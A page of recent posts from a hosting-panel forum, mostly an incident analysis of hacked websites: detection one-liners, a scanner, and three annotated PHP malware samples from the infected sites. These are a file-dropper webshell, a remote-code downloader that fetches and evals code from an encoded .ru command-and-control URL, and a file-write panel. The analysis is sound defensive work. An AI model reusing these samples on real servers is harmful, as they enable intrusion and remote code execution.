Recent Posts

11
DKIM / Re: I'm a bit lost
« Last post by pedromidiasf on Today at 12:48:10 PM »
I'm sorry I lost this message.
Thank you for your time and help.
12
Information / Re: htpasswd on CWP
« Last post by pedromidiasf on Today at 10:02:46 AM »
The FYI for those interested is that cwpsrv runs under Nginx, not Apache -- so syntax for configuration changes needs to be appropriate for Nginx. And thus, .htaccess files are not read or considered.

Also, in order to preserve files through CWP updates, you need to set the immutable bit:
Code:
chattr +i /usr/local/cwpsrv/htdocs/.htpasswd
Yes, I found out. I wasn't familiar with Nginx; that's why what I was doing wasn't working.
Thanks for the immutable bit! This will help!
13
To find files that have base64-encoded parts (used to obfuscate PHP code):
grep -RIl --binary-files=text -P '[A-Za-z0-9+/]{100,}={0,2}' /home

Some false positives might end up being pdf, mp3, image files and so on (you have to take a deep look into it).

--
Alternative:

If you want to filter just php files (not enough to be secure):
grep -RIl --binary-files=text --include="*.php" -P '[A-Za-z0-9+/]{100,}={0,2}' /home

If you want to filter just files without extension (still not enough to be secure):
grep -RIl --binary-files=text --exclude='*.*' -P '[A-Za-z0-9+/]{100,}={0,2}' /home

--
Note: You could extend this outside /home. But as far as I'm concerned, this hack didn't directly affect the system; otherwise you would be seeing cron jobs and other stuff around the system. But I recommend you change all user passwords.
14
There are a lot of exploited index.php files. Some are next to a "c" file, others are just spread across directories.
Use this to find them:
grep -Rl --include="*index.php" 'ucwords' /home/px_disabled/public_html/


To find zipped files that have no zip extension (ignoring Microsoft Office documents). Note that `head ... | read -r b` does not work when sh is bash (read runs in a subshell and $b stays empty), so the first two bytes are captured with a substitution instead:
find /home -type f ! -name '*.zip' ! -name '*.docx' ! -name '*.xlsx' ! -name '*.pptx' -exec sh -c '[ "$(head -c2 "$1")" = "PK" ] && echo "$1"' _ {} \;
15
I also found out that all the files you get distributed by the server are obfuscated differently. Because of this you won't be able to search for specific text. Maybe for specific functions: even functions like "goto", "ucwords" and $GLOBALS, which are not commonly used, are used a lot in these exploits.

The $GLOBALS array is used to add a function (built with a string??) to the system that is afterwards executed. This allows the attacker to execute PHP code without using the "eval" function (I'm not sure about this part). This term is used in all files that I saw, so it might be very useful for finding those exploits.


Another idea:
Also search for files that start with "PK" (zipped content) and don't have the zip extension.
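A small triage scanner, added here as an example and not taken from the thread, that combines the three indicators the posts above describe (a long base64 run, a "PK" zip header on a file without a zip-like extension, and PHP that leans on $GLOBALS, goto and ucwords together) into one pass over a directory tree. It is written in Python rather than as grep/find one-liners so the heuristics can be run together and checked against a constructed sample tree; the function names, thresholds and sample files are my own choices, not anything from the thread.

```python
import os
import re
import tempfile

# Same character class and minimum run length as the grep in the thread.
BASE64_RUN = re.compile(rb"[A-Za-z0-9+/]{100,}={0,2}")
# Extensions that legitimately start with the zip magic (Office files are zips).
ZIP_LIKE = {".zip", ".docx", ".xlsx", ".pptx"}
# Tokens the posts report in the obfuscated samples; two or more together is suspicious.
SUSPECT_TOKENS = (b"$GLOBALS", b"goto ", b"ucwords")

def classify_file(path):
    """Return the sorted list of indicator names triggered by one file."""
    with open(path, "rb") as fh:
        data = fh.read()
    ext = os.path.splitext(path)[1].lower()
    hits = set()
    if data[:2] == b"PK" and ext not in ZIP_LIKE:
        hits.add("zip-magic-no-zip-ext")
    if b"\x00" not in data[:512]:  # crude text check, like grep -I
        if BASE64_RUN.search(data):
            hits.add("long-base64-run")
        if ext == ".php" and sum(t in data for t in SUSPECT_TOKENS) >= 2:
            hits.add("globals-goto-ucwords")
    return sorted(hits)

def scan_tree(root):
    """Map each relative path with at least one hit to its indicator list."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            hits = classify_file(full)
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report

def demo():
    """Scan a constructed sample tree (harmless stand-ins, not real malware)."""
    samples = {
        "c": b"PK\x03\x04" + b"\x00" * 20,                      # zip payload, no extension
        "report.docx": b"PK\x03\x04" + b"\x00" * 20,            # legitimate Office zip
        "wp-login.php": b"<?php $a='" + b"QUJD" * 40 + b"';",    # 160-char base64 run
        "index.php": b"<?php goto x; x: $GLOBALS['f'] = ucwords('a');",
        "clean.php": b"<?php echo 'hello';",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan_tree(root)
```

Point scan_tree() at a real document root (for example /home) to get the same report for a live server; the Office-zip exemption and the two-token rule are what keep the hit list short enough to review by hand.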
16
wp-login.php
It receives a URL GET parameter (?MeL=...) that is related to that "licelic.c" code (all URLs there have this MeL parameter). It also saves files.

(DO NOT EXECUTE THIS!)
Code:
<?php
// WARNING: MALICIOUS CODE - DO NOT EXECUTE

// Initialize variables
$aLTZ_CWiB = false;

// Decoy: assembles the function name "strstr" from single characters
// ("IsSw6u"[1] = 's', "ptB7"[1] = 't', "Pa4rn"[3] = 'r', ...) and calls it; the result is unused
$dseBk = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].("nntWNs")[2].("vgIrrw")[3])("dseBk","GjGg9m");

$b4YsfJ = array("o0FgLZyK4ABbJHto");
$JHwES = (string) null;

// Decoy: assembles "wordwrap" the same way and calls wordwrap("", 15)
$aVcFqS = (("vrgwA7")[3].("kozN")[1].("wr2Hs")[1].("dQSktI")[0].("wbrHMj")[0].("v8SZrf")[4].("cuEaA")[3].("poCzK")[0])("",15);

// Current date and time (unused)
$EKsO2FVW = date("Y-m-d H:i:s");

// Decoy: "strstr" again
$MAsW_z = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].("nntWNs")[2].("vgIrrw")[3])("MAsW_z","cGXdJI");

// Decoy: assembles "trim" and calls trim("   ")
$zs7o1QeOh = (("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])("   ");

// Gate: only continue when the GET parameter "MeL" is present (the same parameter seen in the licelic.c URLs)
if(!isset($_GET["MeL"])) exit;

// More filler
$LHpbN4P2x = defined("_NYaHD");

// POST parameter "RfDJgIyWki" = target filename, passed through the assembled "trim"
$NiXTY2V3mC = isset($_POST["RfDJgIyWki"])?(("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])($_POST["RfDJgIyWki"]):"";

$_blZ7fx = metaphone("moSCud");
$Jt69Gsohg = define("OL0mQ","gDrORyX");
$BMbxgE4 = false;

// POST parameter "xYjdx" = file content, trimmed the same way
$V9Aqud = isset($_POST["xYjdx"])?(("U35tN")[3].("rdb9a")[0].("limY_R")[1].("ZIcamw")[4])($_POST["xYjdx"]):"";

// If content was posted, write it to disk via save_file() and exit,
// returning a fixed marker string so the operator can confirm success
$sf = !empty($V9Aqud)?exit("hHc1Pq7UymG5xrZgRn_".save_file($NiXTY2V3mC,$V9Aqud)):"";

// Decoy: "strstr" once more
$dPE1i_ = (("IsSw6u")[1].("ptB7")[1].("Pa4rn")[3].("Rs87W1")[1].("nntWNs")[2].("vgIrrw")[3])("zOEPQxj","ssMKu");

// CRITICAL FUNCTION: writes arbitrary content to an arbitrary path (file dropper)
// Parameters: $NiXTY2V3mC = filename, $V9Aqud = file content
function save_file($NiXTY2V3mC,$V9Aqud){
    // Open the target file in write mode
    $handle = fopen($NiXTY2V3mC,"w");
    if($handle){
        // Write the posted content to the file
        fwrite($handle,$V9Aqud);
        fclose($handle);
    }
    return "hHc1Pq7UymG5xrZgRn_";
}

$yXQwOmu = addslashes("yXQwOmu");

// Display the upload form (HTML assembled from character indices; elided in the post)
echo ("<z01")[0].("em8fuW")[3].(... [reconstructs HTML form HTML] ...);
?>
17
backup.c
Zip file (change the extension to zip and open it with a zip application). It contains a new file called "back".
This file talks to the exterior. I asked cloud.ai to comment the code:
(DO NOT EXECUTE)
Code:
<?php
// MALICIOUS CODE - DO NOT EXECUTE

// Helper that calls a function by name; hides the real call from simple greps
function sdcss($strrt,$pram_1){
    return $strrt($pram_1);
}

// Downloader stage: fetches remote code and executes it
// Parameters: $url = remote server URL, $time_out = unused (the timeout is randomised below)
function KmY7I3NC($url,$time_out=30){
    // Prefer cURL when it is available
    if(sdcss("function_exists","curl_exec")){
        $fq8h2HYxV=curl_init();

        // Numeric option codes avoid the CURLOPT_* names: 10002 = CURLOPT_URL
        curl_setopt($fq8h2HYxV,10002,$url);

        // 19913 = CURLOPT_RETURNTRANSFER: return the body as a string
        curl_setopt($fq8h2HYxV,19913,1);

        // 64 = CURLOPT_SSL_VERIFYPEER: disable certificate verification
        curl_setopt($fq8h2HYxV,64,false);

        // 13 = CURLOPT_TIMEOUT: random 30-60 second timeout
        curl_setopt($fq8h2HYxV,13,mt_rand(30,60));

        // Fetch the response, drop its first character, base64-decode it
        // and execute it as PHP ("evAl" is case-insensitive and dodges a grep for "eval")
        $fhD2dN4z = evAl(base64_decode(substr(trim(curl_exec($fq8h2HYxV)),1)));

        curl_close($fq8h2HYxV);
    }else{
        // Fallback without cURL: same decode-and-eval via file_get_contents
        $fhD2dN4z = evAl(base64_decode(substr(trim(sdcss("file_get_contents",$url)),1)));
    }

    // Return whatever the executed code returned
    return $fhD2dN4z;
}

// Trigger: only runs when the GET parameter "l" is set
if(isset($_GET["l"])){
    // Collect the remaining GET parameters (empty string when absent)
    $tid = isset($_GET["tid"])?$_GET["tid"]:"";
    $did = isset($_GET["did"])?$_GET["did"]:"";
    $tem = isset($_GET["tem"])?$_GET["tem"]:"";
    $ck = isset($_GET["ck"])?$_GET["ck"]:"";
    $usip = isset($_GET["usip"])?$_GET["usip"]:"";
    $vson = isset($_GET["vson"])?$_GET["vson"]:"";
    $no = isset($_GET["no"])?$_GET["no"]:"";

    // Build the command-and-control URL; the octal/hex escapes decode to
    // "htTp://vOlOVmARTc.Ru/dai/?c=base&l=" followed by the forwarded parameters
    $url = "\150\164\124\160\x3a\x2f\x2f\x76\x4f\x6c\117\x56\x6d\101\x52\124\x2e\122\165\57\x64\141\151\x2f\x3f\x63\75\142\141\x73\145\46\x6c\x3d".$_GET["l"]."&ck=".$ck."&usip=".$usip."&vson=".$vson."&no=".$no."&tid=".$tid."&did=".$did."&tem=".$tem;

    // Fetch the remote PHP code, decode it and execute it
    $str = KmY7I3NC($url);
}

?>

Russian URLs (I've also detected some Russian emails on my WordPress accounts).
But it looks like the domain is down. Probably banned?
18
I found some .c files.
I also found that there are a lot of files called index.php, wp-login.php and files just called "c" (without the dot) across my websites. These files were deep inside some folders of websites I've developed myself. Thankfully I have a clean backup, and these files were not there.

licelic.c
I've decoded a "licelic.c" file and it had listed a lot of the infected websites' locations encoded in base64 and some weird stuff (I can't decode it directly; maybe it is written with another encoding type). I copy-pasted it to Cloud.ai, which decoded it for me and gave me all the URLs that are infected. I tried ChatGPT and it gave me nothing in return.
So "licelic.c" is of extreme importance for you to deobfuscate and evaluate the URLs that are there. This file exposes the folders that were exploited.

Some of its contents:
Non-WordPress website:
[my public url]/folder/folder/folder/index.php?MeL=1#####post_1
[my public url]/folder/folder/folder/index.php?MeL=1#####post_2
[my public url]/folder/folder/folder/index.php?MeL=1#####post_3
[my public url]/folder/folder/folder/index.php?MeL=1#####post_4
[my public url]/folder/folder/folder/index.php?MeL=1#####post_5
[my public url]/folder/folder/folder/index.php?MeL=1#####post_6
[my public url]/folder/folder/folder/index.php?MeL=1#####post_7
[my public url]/folder/folder/folder/index.php?MeL=1#####post_8
...

WordPress website:
[my public url]/folder/folder/folder/index.php/wp-login.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun

"c" file (without the dot)
The "c" file (without the dot) is zip content. You can add ".zip" to this file to open it with a zip application. Inside you get a new file, called "s", that contains obfuscated PHP code that consists of drawing a form that probably interacts with the exploits. Maybe this is an exploit panel.
I leave the code here.
(DO NOT EXECUTE THIS!!!!)
Code:
<?php
// WARNING: This is MALICIOUS code - DO NOT EXECUTE

// Gate: only runs when the GET parameter "DEQ" is present
if(!isset($_GET["DEQ"])) exit;

// Rebuilds a string by picking characters from $TYCMzwTO at the
// comma-separated indices in $x6Mpbe (used to hide function names)
function Za64HUq_($TYCMzwTO, $x6Mpbe) {
    $iGRCOPT = str_split($TYCMzwTO, 1);
    $emivt51O = explode(",", $x6Mpbe);
    $gMRtx3VD = "";
    foreach($emivt51O as $v) {
        $gMRtx3VD .= $iGRCOPT[(int)$v];
    }
    return $gMRtx3VD;
}

// Any static call on this class (hCXKOZB::anything()) fills $GLOBALS with the
// decoded names: puTfPFm = "fopen", CULPcX = "fwrite", mWHO_PtG = "fclose".
// The call itself is not in the excerpt posted here.
class hCXKOZB {
    public static function __callStatic($name, $arguments) {
        $temarr = array(
            "puTfPFm" => array("3eolcnOp5Qf4_GqphVna1eerd2", "10,2,7,1,5"),
            "CULPcX" => array("eheriQctavFofpceulrwEpy_J5rG", "12,19,3,4,7,0"),
            "mWHO_PtG" => array("arsWrD_pcldbIoeelvh8uae4fc_K", "24,8,9,13,2,14")
        );
        foreach($temarr as $key => $v) {
            $GLOBALS[$key] = Za64HUq_($v[0], $v[1]);
        }
    }
}

// POST fields from the form below: WOjVxhQ_ = target path, ZXk7oVxn = content
$vA8r0 = isset($_POST["WOjVxhQ_"]) ? trim($_POST["WOjVxhQ_"]) : "";
$oTlM_Lm47 = isset($_POST["ZXk7oVxn"]) ? trim($_POST["ZXk7oVxn"]) : "";

// When content was posted, $puTfPFm(...) resolves to fopen(path, "w"): opens the target for writing
$n3Bi8fy = !empty($oTlM_Lm47) ? $puTfPFm($vA8r0, "w") : "";

// If a handle was obtained, $mWHO_PtG(...) resolves to fclose(); exit with a marker string
// (the fwrite step is not present in the copy posted here)
if($n3Bi8fy) exit("pIUeNv1Ox74Cq0i" . $mWHO_PtG($n3Bi8fy));

// Displays the form used to submit a path and content
echo "<form method=\"POST\">";
echo "<div><input type=\"text\" name=\"WOjVxhQ_\"></div>";
echo "<div><textarea name=\"ZXk7oVxn\" rows=\"5\"></textarea></div>";
echo "<button type=\"submit\">submit</button>";
echo "</form>";
?>

index.php
This is the index.php deep inside subfolders where the index file I've created was. The root index.php file was replaced by malicious code that executes the payload and imports my original index file.
So take a deep look at every index file you have (even in sub-folders).

These files were touched (date-time changed). Mine is dated 30/08/2024 23:06:51.

So even if you change your panel or format your server, you'll be hacked again if you don't sanitize every website. This means going through all files and folders and applying new rules to stop execution in folders where you don't have PHP files (image uploads, for example).
19
What is the content of the .c file?

But yes, it is related to the attack as well.
The file contains Base64 encrypted code that makes many changes in PHP files related to WordPress: themes and plugins.
20
Yes, but having cPanel/WHM is kinda expensive to have online. I would rather configure a server by myself.
The things you mostly do usually don't require a web panel.
Are you sure these .c files are from this attack and not from another one? I searched and didn't find such malicious files.